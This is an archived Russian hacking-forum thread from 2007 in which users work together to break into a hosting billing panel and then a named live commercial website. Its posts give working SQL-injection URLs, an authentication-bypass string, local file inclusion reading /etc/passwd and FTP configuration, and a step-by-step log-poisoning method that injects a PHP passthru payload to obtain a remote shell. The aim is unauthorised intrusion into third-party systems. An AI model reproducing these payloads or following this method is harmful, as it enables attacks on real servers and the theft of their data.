ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Панель Управления Счетами - BPanel v2.8 Beta2 SE |
21.05.2007, 17:47
|
|
Постоянный
Регистрация: 17.05.2007
Сообщений: 334
Провел на форуме:
3242773
Репутация:
632
|
|
Панель Управления Счетами - BPanel v2.8 Beta2 SE
Вот есть такая панель с демо входом, находится на хостинге, при подстановки в адресную строку:
http://****host.net/billing/faq.php?category=1&identry=1&mod=comment&start=1'
появляется эта надпись:
Так, а вот ломать скрипт нельзя!
Тренируйся лучше на... кошках 
пробывал на XSS не чего не изменяется
на данном сайте нет не форума не гостивой....
что небуть подскажите куда двигаться в плане взлома. |
|
|
22.05.2007, 01:09
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Nmap -- проверь сервиса!
Чекни на domainsdb.net --может есть еще сайты на сервере.
Кста там не Abills billing system <= 0.24.f2, если да , то топай на -- http://nst.void.ru/?q=papers&cat_where=advisories&show=23
|
|
|
|
22.05.2007, 02:39
|
|
Постоянный
Регистрация: 17.05.2007
Сообщений: 334
Провел на форуме:
3242773
Репутация:
632
|
|
Нет там стоит BPanel v2.8 Beta2 SE, на остальных сайтах пока я просмотрел 15 везде статические страници, не одной динамической , (не формов не чего)
|
|
|
|
22.05.2007, 03:55
|
|
Постоянный
Регистрация: 17.05.2007
Сообщений: 334
Провел на форуме:
3242773
Репутация:
632
|
|
http://biznesprom.ru/index.php?categoryID=-6761'
появляется эта ошибка:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
при вводе:http://biznesprom.ru/index.php?categoryID=-6761+union+select+1/*
всё нормально
а при вводе: http://biznesprom.ru/index.php?categoryID=-6761+union+select+1,2/*
http://biznesprom.ru/index.php?categoryID=-6761+union+select+1,2/*
|
|
|
|
22.05.2007, 07:49
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
http://biznesprom.ru/index.php?categoryID=-6761+union+select+31337/*
скл иньекция есть. но к сожалению не выводит ничего.
А вот в логине есть скуль, позволяющая обойти авторизацию
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
22.05.2007, 15:05
|
|
Постоянный
Регистрация: 17.05.2007
Сообщений: 334
Провел на форуме:
3242773
Репутация:
632
|
|
Это как нибуть связанно с этим кодом:
PHP код:
<form action="index.php" method=post>
<tr>
<td>
<table border=0>
<input type="hidden" name="enter" value="1">
<tr>
<td align=right><font class=light>Логин:</font></td>
<td><input type="text" class=ss name="user_login" size=10></td>
</tr>
<tr>
<td align=right><font class=light>Пароль:</font></td>
<td><input name="user_pw" class=ss type="password" size=10></td>
</tr>
в смысле мне надо в командную строку в браузере вводить запрос или можно в само форму авторизации , сейчас попробывал вставлять : ""or "1"="1" не чего не получилось , ну чтож буду сейчас учить матчасть ( читать статьи) |
|
|
|
22.05.2007, 16:25
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
локальный инклуд:
http://biznesprom.ru/index.php?aux_page=../../../../../../../../../../../../../etc/passwd
что делать дальше, думаю, знаете сами.
Последний раз редактировалось p-range; 22.05.2007 в 16:39..
|
|
|
|
22.05.2007, 18:39
|
|
Постоянный
Регистрация: 17.05.2007
Сообщений: 334
Провел на форуме:
3242773
Репутация:
632
|
|
Пробывал подставлять и :
http://biznesprom.ru/index.php?aux_page=../orderform/letter/contacts.php
и остальные варианты с раширением php показывет что
"""""""""""""""""""""""""""""""""""""""""""""""""" """"""""""""""""""""""""
Извините, запрашиваемый документ не был найден на сервере
"""""""""""""""""""""""""""""""""""""""""""""""""" """"""""""""""""""""""""
но при этом при вставке:
http://biznesprom.ru/index.php?aux_page=../images/design/n_02.jpg
показует составляющую рисунка (исходник не знаю какправильно назвать)
удалённо тоже не чего не инклудится , тоесть локальный инклуд ?
пробыва добовлять в конец %00 тоже без результатно ,
брут не подходит так как сижу на диалупе.
|
|
|
|
22.05.2007, 20:33
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
Ядовитый 0 работает.. то есть, что можем из этого извлечь. МЫ находим любые логи (возбмем к примеру логи фтп-шника или сервера (для поисков логов фтпшника нам в помощь приходи http://biznesprom.ru/index.php?aux_page=../../../../../../../../../../../../../etc/proftpd.conf ) .. затем.. если фтп - то .. пытаемся залогиниться на сервер с логином.. ну например <? @passthru($cmd); ?> ... что естественно отображается в логах (неправтльный лог.. значит в еррор-логе) . Инклудим лог, ставим %00 , и у нас есть полноценный шелл.
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
22.05.2007, 23:16
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
blackybr, там и без %00 все работает, т.к. расширения нет.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
